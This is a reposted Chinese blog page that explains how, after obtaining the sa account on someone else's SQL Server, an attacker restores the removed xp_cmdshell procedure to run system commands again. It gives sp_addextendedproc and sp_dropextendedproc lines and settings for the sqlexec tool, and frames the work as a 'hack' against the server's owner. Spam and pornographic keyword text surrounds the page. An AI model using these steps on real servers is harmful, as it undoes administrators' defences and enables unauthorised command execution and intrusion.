国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 數據庫 > SQL Server > 正文

SQL Server SA權限總結

2024-08-31 00:49:17
字體:
來源:轉載
供稿:網友

最近需要用到這些東西的時候,發現自己有點記不清了,這真是人老了做什么都不行了。沒辦法,只好在自己的blog上總結一下吧。使用sqlexec加管理員的過程這里冰血就不涉及了。

前提需要工具:sql query analyzer和sqlexec sunx version

第一部分:
有關去掉xp_cmdshell來保護系統的分析總結:
首先知道一下語句:
1.去掉xp_cmdshell擴展過程的方法是使用如下語句:
code:
if exists (select * from dbo.sysobjects where id=object_id(n'[dbo].[xpcmdshell]') and objectproperty(id,n'isextendedproc')=1)
exec sp_dropextendedproc n'[dbo].[xp_cmdshell]'


2.添加xp_cmdshell擴展過程的方法是使用如下語句:
code:
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'


現在看看現象:
我們在取得sa權限后遠程用sqlexec執行cmd命令,出現提示sql_error,那么很可能是去掉了xp_cmdshell。

現在來看看被去掉xp_cmdshell后恢復的兩種方法:
方法一、使用sql query analyzer連接對方后直接寫入,挺方便
code:
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'


方法二、使用sqlexec sunx version
首先在sqlexec sunx version的format選項里填上%s,在cmd選項里輸入
code:
sp_addextendedproc 'xp_cmdshell','xpsql70.dll'

或者對sql2000情況下使用
code:
sp_addextendedproc 'xp_cmdshell','xplog70.dll'


另外使用sqlexec sunx version來去除xp_cmdshell的方法
和加的時候選擇條件一樣,然后輸入
code:
sp_dropextendedproc 'xp_cmdshell'

就可以了

第二部分:
假如對方已經把xplog70.dll刪除或者改了名,我們來用下面的方法繼續我們的hack任務:
當出現如下現象暗示代表很有可能是xplog70.dll刪除或者改了名。
在查詢分析器中寫入
code:
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

提示
數據庫中已存在名為'xp_cmdshell'的對象

那么我們如何恢復呢?
其實按照高手lcx提供的方法,我們可以通過使用查詢分析器中寫腳本來實現。
具體腳本源代碼請點擊連接獲得。

 

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 临潭县| 宁陕县| 雷波县| 邻水| 陆河县| 台北县| 曲水县| 芜湖县| 岗巴县| 凤凰县| 洛浦县| 镇沅| 万载县| 平和县| 炎陵县| 文水县| 孝昌县| 南郑县| 巴东县| 长宁区| 秦安县| 双鸭山市| 敦化市| 康保县| 桂阳县| 长兴县| 新郑市| 宜君县| 晋中市| 河津市| 新民市| 张北县| 白水县| 凤阳县| 浑源县| 合阳县| 汽车| 浦城县| 潍坊市| 中山市| 衡南县|